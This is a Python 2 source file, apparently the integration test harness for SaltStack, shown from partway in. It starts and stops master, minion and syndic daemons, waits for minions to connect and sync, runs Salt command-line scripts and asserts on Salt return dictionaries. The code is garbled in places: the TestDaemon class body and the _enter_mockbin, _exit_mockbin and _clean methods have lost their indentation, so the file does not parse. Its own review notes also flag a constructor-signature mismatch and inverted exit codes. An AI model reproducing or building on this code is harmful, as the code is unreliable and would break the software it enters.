# Interpreter name matching the running version, e.g. 'python2.7'.
PYEXEC = 'python{0}.{1}'.format(sys.version_info[0], sys.version_info[1])
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
SYS_TMP_DIR = os.environ.get('TMPDIR', tempfile.gettempdir())
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
log = logging.getLogger(__name__)
def print_header(header, sep='~', top=True, bottom=True, inline=False,
                 centered=False):
    '''
    Pretty-print a console header, optionally with a full-width "ruler"
    above and/or below, rendered inline with the ruler, and/or centered.
    '''
    if top and not inline:
        print(sep * PNUM)
    # Pick the format template for the header line itself.
    if inline and centered:
        template = u'{0:{sep}^{width}}'
    elif inline:
        template = u'{0:{sep}<{width}}'
    elif centered:
        template = u'{0:^{width}}'
    else:
        template = u'{0}'
    print(template.format(header, sep=sep, width=PNUM))
    if bottom and not inline:
        print(sep * PNUM)
def run_tests(TestCase):
    '''
    Run integration tests for a chosen test case.

    Function uses optparse to set up test environment

    NOTE(review): sys.exit(runner.wasSuccessful()) exits with status 1 on
    success (True == 1) and 0 on failure -- inverted from the usual shell
    convention; confirm whether callers depend on this.  Also, TestDaemon
    is constructed here with clean=..., while its __init__ below takes a
    single `opts` argument -- verify against the class definition.
    '''
    from saltunittest import TestLoader, TextTestRunner
    opts = parse_opts()
    loader = TestLoader()
    tests = loader.loadTestsFromTestCase(TestCase)
    print('Setting up Salt daemons to execute tests')
    with TestDaemon(clean=opts.clean):
        runner = TextTestRunner(verbosity=opts.verbosity).run(tests)
    sys.exit(runner.wasSuccessful())
def parse_opts():
    '''
    Build and evaluate the optparse option set for the integration test
    runner, returning the parsed options object (positional args ignored).
    '''
    parser = optparse.OptionParser()
    # Data-driven option table: (flags, add_option keyword arguments).
    option_specs = [
        (('-v', '--verbose'),
         dict(dest='verbosity', default=1, action='count',
              help='Verbose test runner output')),
        (('--clean',),
         dict(dest='clean', default=True, action='store_true',
              help=('Clean up test environment before and after '
                    'integration testing (default behaviour)'))),
        (('--no-clean',),
         dict(dest='clean', action='store_false',
              help=('Don\'t clean up test environment before and after '
                    'integration testing (speed up test process)'))),
    ]
    for flags, kwargs in option_specs:
        parser.add_option(*flags, **kwargs)
    options, _ = parser.parse_args()
    return options
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
    def __init__(self, opts=None):
        # opts: parsed options object; must provide `no_colors` here (and
        # `clean` / `sysinfo` later).  NOTE(review): the default of None
        # would raise AttributeError on opts.no_colors immediately, so
        # callers must pass a real options object -- confirm intent.
        self.opts = opts
        self.colors = get_colors(opts.no_colors is False)
    def __enter__(self):
        '''
        Start a master and minion
        '''
        # Load the five daemon configs (master, minion, sub_minion,
        # syndic master, syndic) from the integration files/conf tree.
        self.master_opts = salt.config.master_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
        )
        self.minion_opts = salt.config.minion_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'minion')
        )
        #if sys.version_info < (2, 7):
        #    self.minion_opts['multiprocessing'] = False
        self.sub_minion_opts = salt.config.minion_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
        )
        #if sys.version_info < (2, 7):
        #    self.sub_minion_opts['multiprocessing'] = False
        self.smaster_opts = salt.config.master_config(
            os.path.join(
                INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic_master'
            )
        )
        self.syndic_opts = salt.config.minion_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic'))
        self.syndic_opts['_master_conf_file'] = os.path.join(
            INTEGRATION_TEST_DIR,
            'files/conf/master'
        )
        # Set up config options that require internal data
        self.master_opts['pillar_roots'] = {
            'base': [os.path.join(FILES, 'pillar', 'base')]
        }
        self.master_opts['file_roots'] = {
            'base': [
                os.path.join(FILES, 'file', 'base'),
                # Let's support runtime created files that can be used like:
                #   salt://my-temp-file.txt
                TMP_STATE_TREE
            ]
        }
        self.master_opts['ext_pillar'] = [
            {'cmd_yaml': 'cat {0}'.format(
                os.path.join(
                    FILES,
                    'ext.yaml'
                )
            )}
        ]
        # clean up the old files
        self._clean()
        # Point the config values to the correct temporary paths
        for name in ('hosts', 'aliases'):
            optname = '{0}.file'.format(name)
            optname_path = os.path.join(TMP, name)
            self.master_opts[optname] = optname_path
            self.minion_opts[optname] = optname_path
            self.sub_minion_opts[optname] = optname_path
        # Pre-create every runtime directory the daemons expect, owned by
        # the current user.
        verify_env([os.path.join(self.master_opts['pki_dir'], 'minions'),
                    os.path.join(self.master_opts['pki_dir'], 'minions_pre'),
                    os.path.join(self.master_opts['pki_dir'],
                                 'minions_rejected'),
                    os.path.join(self.master_opts['cachedir'], 'jobs'),
                    os.path.join(self.smaster_opts['pki_dir'], 'minions'),
                    os.path.join(self.smaster_opts['pki_dir'], 'minions_pre'),
                    os.path.join(self.smaster_opts['pki_dir'],
                                 'minions_rejected'),
                    os.path.join(self.smaster_opts['cachedir'], 'jobs'),
                    os.path.dirname(self.master_opts['log_file']),
                    self.minion_opts['extension_modules'],
                    self.sub_minion_opts['extension_modules'],
                    self.sub_minion_opts['pki_dir'],
                    self.master_opts['sock_dir'],
                    self.smaster_opts['sock_dir'],
                    self.sub_minion_opts['sock_dir'],
                    self.minion_opts['sock_dir'],
                    TMP_STATE_TREE,
                    TMP
                    ],
                   pwd.getpwuid(os.getuid()).pw_name)
        # Set up PATH to mockbin
        self._enter_mockbin()
        # Start master, minion, sub-minion, syndic master and syndic, each
        # in its own process.
        master = salt.master.Master(self.master_opts)
        self.master_process = multiprocessing.Process(target=master.start)
        self.master_process.start()
        minion = salt.minion.Minion(self.minion_opts)
        self.minion_process = multiprocessing.Process(target=minion.tune_in)
        self.minion_process.start()
        sub_minion = salt.minion.Minion(self.sub_minion_opts)
        self.sub_minion_process = multiprocessing.Process(
            target=sub_minion.tune_in
        )
        self.sub_minion_process.start()
        smaster = salt.master.Master(self.smaster_opts)
        self.smaster_process = multiprocessing.Process(target=smaster.start)
        self.smaster_process.start()
        syndic = salt.minion.Syndic(self.syndic_opts)
        self.syndic_process = multiprocessing.Process(target=syndic.tune_in)
        self.syndic_process.start()
        # Optionally dump the effective configs for debugging.
        if os.environ.get('DUMP_SALT_CONFIG', None) is not None:
            from copy import deepcopy
            try:
                import yaml
                os.makedirs('/tmp/salttest/conf')
            except OSError:
                pass
            master_opts = deepcopy(self.master_opts)
            minion_opts = deepcopy(self.minion_opts)
            master_opts.pop('conf_file', None)
            master_opts['user'] = pwd.getpwuid(os.getuid()).pw_name
            minion_opts['user'] = pwd.getpwuid(os.getuid()).pw_name
            minion_opts.pop('conf_file', None)
            minion_opts.pop('grains', None)
            minion_opts.pop('pillar', None)
            open('/tmp/salttest/conf/master', 'w').write(
                yaml.dump(master_opts)
            )
            open('/tmp/salttest/conf/minion', 'w').write(
                yaml.dump(minion_opts)
            )
        self.minion_targets = set(['minion', 'sub_minion'])
        self.pre_setup_minions()
        self.setup_minions()
        if self.opts.sysinfo:
            from salt import version
            print_header('~~~~~~~ Versions Report ', inline=True)
            print('\n'.join(version.versions_report()))
            print_header(
                '~~~~~~~ Minion Grains Information ', inline=True,
            )
            print_header('', sep='=', inline=True)
        # post_setup_minions() always runs, even if an override of
        # setup hooks raised above this point on the return path.
        try:
            return self
        finally:
            self.post_setup_minions()
    @property
    def client(self):
        '''
        Return a local client which will be used for example to ping and sync
        the test minions.

        This client is defined as a class attribute because it's creation needs
        to be deferred to a latter stage. If created it on `__enter__` like it
        previously was, it would not receive the master events.
        '''
        # NOTE: a new LocalClient is constructed on every property access;
        # callers must not expect cached state between accesses.
        return salt.client.LocalClient(
            mopts=self.master_opts
        )
    def __exit__(self, type, value, traceback):
        '''
        Kill the minion and master processes
        '''
        # Each daemon process is terminated and then joined so no zombie
        # processes are left behind, then mockbin PATH changes and temporary
        # directories are cleaned up.
        self.sub_minion_process.terminate()
        self.sub_minion_process.join()
        self.minion_process.terminate()
        self.minion_process.join()
        self.master_process.terminate()
        self.master_process.join()
        self.syndic_process.terminate()
        self.syndic_process.join()
        self.smaster_process.terminate()
        self.smaster_process.join()
        self._exit_mockbin()
        self._clean()
    def pre_setup_minions(self):
        '''
        Subclass this method for additional minion setups.
        '''
        # Intentionally a no-op hook; called before setup_minions().
    def setup_minions(self):
        '''
        Wait for the test minions to connect back to the master and, when
        required, make them re-sync their custom modules.

        Returns False when the minions failed to connect or to sync, True
        otherwise.
        '''
        # Wait for minions to connect back
        wait_minion_connections = multiprocessing.Process(
            target=self.wait_for_minion_connections,
            args=(self.minion_targets, self.MINIONS_CONNECT_TIMEOUT)
        )
        wait_minion_connections.start()
        wait_minion_connections.join()
        wait_minion_connections.terminate()
        # A non-zero exit code means wait_for_minion_connections() raised
        # SystemExit because some minion never answered test.ping.
        if wait_minion_connections.exitcode > 0:
            print(
                '\n {RED_BOLD}*{ENDC} ERROR: Minions failed to connect'.format(
                    **self.colors
                )
            )
            return False
        del wait_minion_connections
        sync_needed = self.opts.clean
        if self.opts.clean is False:
            def sumfile(fpath):
                # Since we will be do'in this for small files, it should be ok
                fobj = fopen(fpath)
                m = md5()
                while True:
                    d = fobj.read(8096)
                    if not d:
                        break
                    m.update(d)
                return m.hexdigest()
            # Since we're not cleaning up, let's see if modules are already up
            # to date so we don't need to re-sync them
            modules_dir = os.path.join(FILES, 'file', 'base', '_modules')
            for fname in os.listdir(modules_dir):
                if not fname.endswith('.py'):
                    continue
                dfile = os.path.join(
                    '/tmp/salttest/cachedir/extmods/modules/', fname
                )
                if not os.path.exists(dfile):
                    sync_needed = True
                    break
                sfile = os.path.join(modules_dir, fname)
                # Any checksum mismatch forces a full re-sync.
                if sumfile(sfile) != sumfile(dfile):
                    sync_needed = True
                    break
        if sync_needed:
            # Wait for minions to "sync_all"
            sync_minions = multiprocessing.Process(
                target=self.sync_minion_modules,
                args=(self.minion_targets, self.MINIONS_SYNC_TIMEOUT)
            )
            sync_minions.start()
            sync_minions.join()
            if sync_minions.exitcode > 0:
                return False
            sync_minions.terminate()
            del sync_minions
        return True
    def post_setup_minions(self):
        '''
        Subclass this method to execute code after the minions have been setup
        '''
        # Intentionally a no-op hook; called from the __enter__ finally block.
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
def _clean(self):
'''
Clean out the tmp files
'''
if not self.opts.clean:
return
if os.path.isdir(self.sub_minion_opts['root_dir']):
shutil.rmtree(self.sub_minion_opts['root_dir'])
if os.path.isdir(self.master_opts['root_dir']):
shutil.rmtree(self.master_opts['root_dir'])
if os.path.isdir(self.smaster_opts['root_dir']):
shutil.rmtree(self.smaster_opts['root_dir'])
if os.path.isdir(TMP):
shutil.rmtree(TMP)
    def wait_for_jid(self, targets, jid, timeout=120):
        '''
        Poll `saltutil.running` on `targets` until job `jid` is no longer
        reported as running, or `timeout` seconds elapse.

        Returns True when the job finished, False on timeout.
        '''
        time.sleep(1)  # Allow some time for minions to accept jobs
        now = datetime.now()
        expire = now + timedelta(seconds=timeout)
        job_finished = False
        while now <= expire:
            running = self.__client_job_running(targets, jid)
            sys.stdout.write('\r' + ' ' * PNUM + '\r')
            if not running and job_finished is False:
                # Let's not have false positives and wait one more seconds
                job_finished = True
            elif not running and job_finished is True:
                # Two consecutive "not running" polls: the job really ended.
                return True
            elif running and job_finished is True:
                job_finished = False
            if job_finished is False:
                sys.stdout.write(
                    ' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                        '{0}'.format(expire - now).rsplit('.', 1)[0],
                        ', '.join(running),
                        **self.colors
                    )
                )
                sys.stdout.flush()
            time.sleep(1)
            now = datetime.now()
        else:
            # while-else: only reached when the loop expired without return.
            sys.stdout.write(
                '\n {RED_BOLD}*{ENDC} ERROR: Failed to get information '
                'back\n'.format(**self.colors)
            )
            sys.stdout.flush()
        return False
    def __client_job_running(self, targets, jid):
        '''
        Return the subset of `targets` that still report job `jid` as the
        currently running job (Python 2 dict API: iteritems).
        '''
        running = self.client.cmd(
            list(targets), 'saltutil.running', expr_form='list'
        )
        return [
            k for (k, v) in running.iteritems() if v and v[0]['jid'] == jid
        ]
    def wait_for_minion_connections(self, targets, timeout):
        '''
        Repeatedly `test.ping` the expected `targets` until all of them
        answer or `timeout` seconds elapse; raises SystemExit on timeout so
        the parent process sees a non-zero exit code.
        '''
        sys.stdout.write(
            ' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
            'connect back\n'.format(
                (timeout > 60 and
                 timedelta(seconds=timeout) or
                 '{0} secs'.format(timeout)),
                ', '.join(targets),
                **self.colors
            )
        )
        sys.stdout.flush()
        expected_connections = set(targets)
        now = datetime.now()
        expire = now + timedelta(seconds=timeout)
        while now <= expire:
            sys.stdout.write('\r' + ' ' * PNUM + '\r')
            sys.stdout.write(
                ' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                    '{0}'.format(expire - now).rsplit('.', 1)[0],
                    ', '.join(expected_connections),
                    **self.colors
                )
            )
            sys.stdout.flush()
            responses = self.client.cmd(
                list(expected_connections), 'test.ping', expr_form='list',
            )
            for target in responses:
                if target not in expected_connections:
                    # Someone(minion) else "listening"?
                    # NOTE: Python 2 print statement; this module predates py3.
                    print target
                    continue
                expected_connections.remove(target)
                sys.stdout.write('\r' + ' ' * PNUM + '\r')
                sys.stdout.write(
                    ' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
                        target, **self.colors
                    )
                )
                sys.stdout.flush()
            if not expected_connections:
                return
            time.sleep(1)
            now = datetime.now()
        else:
            # while-else: reached only when the timeout expired.
            print(
                '\n {RED_BOLD}*{ENDC} WARNING: Minions failed to connect '
                'back. Tests requiring them WILL fail'.format(**self.colors)
            )
            print_header('=', sep='=', inline=True)
            raise SystemExit()
    def sync_minion_modules(self, targets, timeout=120):
        '''
        Make every connected minion run `saltutil.sync_modules` and wait for
        all of them to report back.  Raises SystemExit when the sync job does
        not finish within `timeout` seconds.
        '''
        # Let's sync all connected minions
        print(
            ' {LIGHT_BLUE}*{ENDC} Syncing minion\'s modules '
            '(saltutil.sync_modules)'.format(
                ', '.join(targets),
                **self.colors
            )
        )
        syncing = set(targets)
        jid_info = self.client.run_job(
            list(targets), 'saltutil.sync_modules',
            expr_form='list',
            timeout=9999999999999999,
        )
        if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
            print(
                ' {RED_BOLD}*{ENDC} WARNING: Minions failed to sync modules. '
                'Tests requiring these modules WILL fail'.format(**self.colors)
            )
            raise SystemExit()
        while syncing:
            # Poll the job returns with a 1 second timeout per call.
            rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
            if rdata:
                for name, output in rdata.iteritems():
                    if not output['ret']:
                        # Already synced!?
                        syncing.remove(name)
                        continue
                    print(
                        ' {LIGHT_GREEN}*{ENDC} Synced {0} modules: '
                        '{1}'.format(
                            name, ', '.join(output['ret']), **self.colors
                        )
                    )
                    # Synced!
                    try:
                        syncing.remove(name)
                    except KeyError:
                        print(
                            ' {RED_BOLD}*{ENDC} {0} already synced??? '
                            '{1}'.format(name, output, **self.colors)
                        )
        return True
class SaltClientTestCaseMixIn(object):
    '''
    Mix-in providing a LocalClient bound to one of the test configuration
    files (`_salt_client_config_file_name_`, 'master' by default).
    '''

    _salt_client_config_file_name_ = 'master'

    # BUG FIX: the original declared
    #   __slots__ = ('client', '_salt_client_config_file_name_')
    # which conflicts with the class-level `client` property and the
    # `_salt_client_config_file_name_` class attribute, making class creation
    # raise "ValueError: ... in __slots__ conflicts with class variable".
    # __slots__ is pointless on a mix-in used with TestCase (whose instances
    # have a __dict__ anyway), so it is removed.

    @property
    def client(self):
        # A fresh LocalClient is built on every access from the configured
        # config file under the integration test directory.
        return salt.client.LocalClient(
            os.path.join(
                INTEGRATION_TEST_DIR, 'files', 'conf',
                self._salt_client_config_file_name_
            )
        )
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
    '''
    Execute a module function
    '''
    def minion_run(self, _function, *args, **kw):
        '''
        Run a single salt function on the 'minion' target and condition
        the return down to match the behavior of the raw function call
        '''
        return self.run_function(_function, args, **kw)

    def run_function(self, function, arg=(), minion_tgt='minion', timeout=25,
                     **kwargs):
        '''
        Run a single salt function and condition the return down to match the
        behavior of the raw function call
        '''
        # These functions legitimately return None, so a None reply from them
        # must not be treated as a failed command.
        know_to_return_none = ('file.chown', 'file.chgrp')
        orig = self.client.cmd(
            minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
        )
        if minion_tgt not in orig:
            self.skipTest(
                'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
                'from the minion \'{0}\'. Command output: {1}'.format(
                    minion_tgt, orig
                )
            )
        elif orig[minion_tgt] is None and function not in know_to_return_none:
            self.skipTest(
                'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
                'the minion \'{1}\'. Command output: {2}'.format(
                    function, minion_tgt, orig
                )
            )
        return orig[minion_tgt]

    def run_state(self, function, **kwargs):
        '''
        Run the state.single command and return the state return structure
        '''
        return self.run_function('state.single', [function], **kwargs)

    @property
    def minion_opts(self):
        '''
        Return the options used for the minion
        '''
        return salt.config.minion_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'minion')
        )

    @property
    def sub_minion_opts(self):
        '''
        Return the options used for the minion
        '''
        return salt.config.minion_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
        )

    @property
    def master_opts(self):
        '''
        Return the options used for the minion
        '''
        return salt.config.master_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
        )
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
    '''
    Execute a syndic based execution test
    '''
    # Use the syndic master's configuration for the LocalClient.
    _salt_client_config_file_name_ = 'syndic_master'

    def run_function(self, function, arg=()):
        '''
        Run a single salt function and condition the return down to match the
        behavior of the raw function call
        '''
        orig = self.client.cmd('minion', function, arg, timeout=25)
        if 'minion' not in orig:
            self.skipTest(
                'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
                'from the minion. Command output: {0}'.format(orig)
            )
        return orig['minion']
class ShellCase(TestCase):
    '''
    Execute a test for a shell command
    '''
    def run_script(self, script, arg_str, catch_stderr=False, timeout=None):
        '''
        Execute a script with the given argument string

        Returns the stdout lines, or a (stdout_lines, stderr_lines) tuple
        when `catch_stderr` is True; False when the script does not exist.
        `timeout` (POSIX only) kills the whole process group on expiry.
        '''
        path = os.path.join(SCRIPT_DIR, script)
        if not os.path.isfile(path):
            return False
        ppath = 'PYTHONPATH={0}:{1}'.format(CODE_DIR, ':'.join(sys.path[1:]))
        cmd = '{0} {1} {2} {3}'.format(ppath, PYEXEC, path, arg_str)
        popen_kwargs = {
            'shell': True,
            'stdout': PIPE
        }
        if catch_stderr is True:
            popen_kwargs['stderr'] = PIPE
        if not sys.platform.lower().startswith('win'):
            popen_kwargs['close_fds'] = True
            def detach_from_parent_group():
                # detach from parent group (no more inherited signals!)
                os.setpgrp()
            popen_kwargs['preexec_fn'] = detach_from_parent_group
        elif sys.platform.lower().startswith('win') and timeout is not None:
            raise RuntimeError('Timeout is not supported under windows')
        process = Popen(cmd, **popen_kwargs)
        if timeout is not None:
            stop_at = datetime.now() + timedelta(seconds=timeout)
            term_sent = False
            while True:
                process.poll()
                if process.returncode is not None:
                    break
                if datetime.now() > stop_at:
                    # First expiry: interrupt the group; second: kill it.
                    if term_sent is False:
                        # Kill the process group since sending the term signal
                        # would only terminate the shell, not the command
                        # executed in the shell
                        os.killpg(os.getpgid(process.pid), signal.SIGINT)
                        term_sent = True
                        continue
                    # As a last resort, kill the process group
                    os.killpg(os.getpgid(process.pid), signal.SIGKILL)
                    out = [
                        'Process took more than {0} seconds to complete. '
                        'Process Killed!'.format(timeout)
                    ]
                    if catch_stderr:
                        return out, [
                            'Process killed, unable to catch stderr output'
                        ]
                    return out
        if catch_stderr:
            if sys.version_info < (2, 7):
                # On python 2.6, the subprocess'es communicate() method uses
                # select which, is limited by the OS to 1024 file descriptors
                # We need more available descriptors to run the tests which
                # need the stderr output.
                # So instead of .communicate() we wait for the process to
                # finish, but, as the python docs state "This will deadlock
                # when using stdout=PIPE and/or stderr=PIPE and the child
                # process generates enough output to a pipe such that it
                # blocks waiting for the OS pipe buffer to accept more data.
                # Use communicate() to avoid that." <- a catch, catch situation
                #
                # Use this work around were it's needed only, python 2.6
                process.wait()
                out = process.stdout.read()
                err = process.stderr.read()
            else:
                out, err = process.communicate()
            # Force closing stderr/stdout to release file descriptors
            process.stdout.close()
            process.stderr.close()
            try:
                return out.splitlines(), err.splitlines()
            finally:
                try:
                    process.terminate()
                except OSError as err:
                    # process already terminated
                    pass
        data = process.communicate()
        process.stdout.close()
        try:
            return data[0].splitlines()
        finally:
            try:
                process.terminate()
            except OSError as err:
                # process already terminated
                pass

    def run_salt(self, arg_str):
        '''
        Execute salt
        '''
        mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
        arg_str = '-c {0} {1}'.format(mconf, arg_str)
        return self.run_script('salt', arg_str)

    def run_run(self, arg_str):
        '''
        Execute salt-run
        '''
        mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
        arg_str = '-c {0} {1}'.format(mconf, arg_str)
        return self.run_script('salt-run', arg_str)

    def run_run_plus(self, fun, options='', *arg):
        '''
        Execute Salt run and the salt run function and return the data from
        each in a dict
        '''
        ret = {}
        ret['out'] = self.run_run(
            '{0} {1} {2}'.format(options, fun, ' '.join(arg))
        )
        opts = salt.config.master_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
        )
        opts.update({'doc': False, 'fun': fun, 'arg': arg})
        # Run the runner in-process with its stdio silenced.
        with RedirectStdStreams():
            runner = salt.runner.Runner(opts)
            ret['fun'] = runner.run()
        return ret

    def run_key(self, arg_str, catch_stderr=False):
        '''
        Execute salt-key
        '''
        mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
        arg_str = '-c {0} {1}'.format(mconf, arg_str)
        return self.run_script('salt-key', arg_str, catch_stderr=catch_stderr)

    def run_cp(self, arg_str):
        '''
        Execute salt-cp
        '''
        mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
        arg_str = '--config-dir {0} {1}'.format(mconf, arg_str)
        return self.run_script('salt-cp', arg_str)

    def run_call(self, arg_str):
        '''
        Execute salt-call
        '''
        mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
        arg_str = '--config-dir {0} {1}'.format(mconf, arg_str)
        return self.run_script('salt-call', arg_str)
class ShellCaseCommonTestsMixIn(object):
    '''
    Tests shared by all the salt CLI binary test cases; subclasses set
    `_call_binary_` to the binary name under test.
    '''
    def test_version_includes_binary_name(self):
        # `--version` output must mention both the binary name and the
        # installed salt version.
        if getattr(self, '_call_binary_', None) is None:
            self.skipTest('\'_call_binary_\' not defined.')
        out = '\n'.join(self.run_script(self._call_binary_, '--version'))
        self.assertIn(self._call_binary_, out)
        self.assertIn(salt.__version__, out)

    def test_salt_with_git_version(self):
        if getattr(self, '_call_binary_', None) is None:
            self.skipTest('\'_call_binary_\' not defined.')
        from salt.utils import which
        from salt.version import __version_info__
        git = which('git')
        if not git:
            self.skipTest('The git binary is not available')
        # Let's get the output of git describe
        process = subprocess.Popen(
            [git, 'describe'],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            close_fds=True,
            cwd=CODE_DIR
        )
        out, err = process.communicate()
        if not out:
            self.skipTest(
                'Failed to get the output of \'git describe\'. '
                'Error: {0!r}'.format(
                    err
                )
            )
        # Strip the leading 'v' and keep only the dotted numeric part.
        parsed_version = '{0}'.format(out.strip().lstrip('v'))
        parsed_version_info = tuple([
            int(i) for i in parsed_version.split('-', 1)[0].split('.')
        ])
        if parsed_version_info and parsed_version_info < __version_info__:
            self.skipTest(
                'We\'re likely about to release a new version. '
                'This test would fail. Parsed({0!r}) < Expected({1!r})'.format(
                    parsed_version_info, __version_info__
                )
            )
        elif parsed_version_info != __version_info__:
            self.skipTest(
                'In order to get the proper salt version with the '
                'git hash you need to update salt\'s local git '
                'tags. Something like: \'git fetch --tags\' or '
                '\'git fetch --tags upstream\' if you followed '
                'salt\'s contribute documentation. The version '
                'string WILL NOT include the git hash.'
            )
        out = '\n'.join(self.run_script(self._call_binary_, '--version'))
        self.assertIn(parsed_version, out)
class SaltReturnAssertsMixIn(object):
    '''
    Mix-in providing assertions over salt state/function return dictionaries.
    '''

    def assertReturnSaltType(self, ret):
        '''
        Assert that `ret` is a dictionary (the salt return type).
        '''
        try:
            self.assertTrue(isinstance(ret, dict))
        except AssertionError:
            raise AssertionError(
                '{0} is not dict. Salt returned: {1}'.format(
                    type(ret).__name__, ret
                )
            )

    def assertReturnNonEmptySaltType(self, ret):
        '''
        Assert that `ret` is a non-empty dictionary.
        '''
        self.assertReturnSaltType(ret)
        try:
            self.assertNotEqual(ret, {})
        except AssertionError:
            # BUG FIX: the original raised the raw template string
            # '{} is equal to {}. ...' without calling .format(), so the
            # error message contained literal '{}' placeholders.
            raise AssertionError(
                '{0} is equal to {1}. Salt returned an empty '
                'dictionary.'.format(ret, {})
            )

    def __return_valid_keys(self, keys):
        # Normalize `keys` to a list; accepts tuple, string or list.
        if isinstance(keys, tuple):
            # If it's a tuple, turn it into a list
            keys = list(keys)
        elif isinstance(keys, basestring):
            # If it's a basestring , make it a one item list
            keys = [keys]
        elif not isinstance(keys, list):
            # If we've reached here, it's a bad type passed to keys
            raise RuntimeError('The passed keys need to be a list')
        return keys

    def __getWithinSaltReturn(self, ret, keys):
        '''
        Drill into each state-id entry of `ret` following `keys` and return
        the nested value found (the value from the last entry iterated).
        '''
        self.assertReturnNonEmptySaltType(ret)
        keys = self.__return_valid_keys(keys)
        okeys = keys[:]
        # NOTE: Python 2 dict API (itervalues).
        for part in ret.itervalues():
            try:
                ret_item = part[okeys.pop(0)]
            except (KeyError, TypeError):
                raise AssertionError(
                    'Could not get ret{0} from salt\'s return: {1}'.format(
                        ''.join(['[{0!r}]'.format(k) for k in keys]), part
                    )
                )
            while okeys:
                try:
                    ret_item = ret_item[okeys.pop(0)]
                except (KeyError, TypeError):
                    raise AssertionError(
                        'Could not get ret{0} from salt\'s return: {1}'.format(
                            ''.join(['[{0!r}]'.format(k) for k in keys]), part
                        )
                    )
        return ret_item

    def assertSaltTrueReturn(self, ret):
        '''
        Assert the state result flag is True, with a helpful message.
        '''
        try:
            self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
        except AssertionError:
            log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
            try:
                raise AssertionError(
                    '{result} is not True. Salt Comment:\n{comment}'.format(
                        **(ret.values()[0])
                    )
                )
            except (AttributeError, IndexError):
                raise AssertionError(
                    'Failed to get result. Salt Returned:\n{0}'.format(
                        pprint.pformat(ret)
                    )
                )

    def assertSaltFalseReturn(self, ret):
        '''
        Assert the state result flag is False.
        '''
        try:
            self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
        except AssertionError:
            log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
            try:
                raise AssertionError(
                    '{result} is not False. Salt Comment:\n{comment}'.format(
                        **(ret.values()[0])
                    )
                )
            except (AttributeError, IndexError):
                raise AssertionError(
                    'Failed to get result. Salt Returned: {0}'.format(ret)
                )

    def assertSaltNoneReturn(self, ret):
        '''
        Assert the state result flag is None (test mode).
        '''
        try:
            self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
        except AssertionError:
            log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
            try:
                raise AssertionError(
                    '{result} is not None. Salt Comment:\n{comment}'.format(
                        **(ret.values()[0])
                    )
                )
            except (AttributeError, IndexError):
                raise AssertionError(
                    'Failed to get result. Salt Returned: {0}'.format(ret)
                )

    def assertInSaltComment(self, ret, in_comment):
        return self.assertIn(
            in_comment, self.__getWithinSaltReturn(ret, 'comment')
        )

    def assertNotInSaltComment(self, ret, not_in_comment):
        return self.assertNotIn(
            not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
        )

    def assertSaltCommentRegexpMatches(self, ret, pattern):
        return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')

    def assertInSaltReturn(self, ret, item_to_check, keys):
        return self.assertIn(
            item_to_check, self.__getWithinSaltReturn(ret, keys)
        )

    def assertNotInSaltReturn(self, ret, item_to_check, keys):
        return self.assertNotIn(
            item_to_check, self.__getWithinSaltReturn(ret, keys)
        )

    def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
        return self.assertRegexpMatches(
            self.__getWithinSaltReturn(ret, keys), pattern
        )

    def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
        keys = ['changes'] + self.__return_valid_keys(keys)
        return self.assertEqual(
            self.__getWithinSaltReturn(ret, keys), comparison
        )

    def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
        keys = ['changes'] + self.__return_valid_keys(keys)
        return self.assertNotEqual(
            self.__getWithinSaltReturn(ret, keys), comparison
        )
|
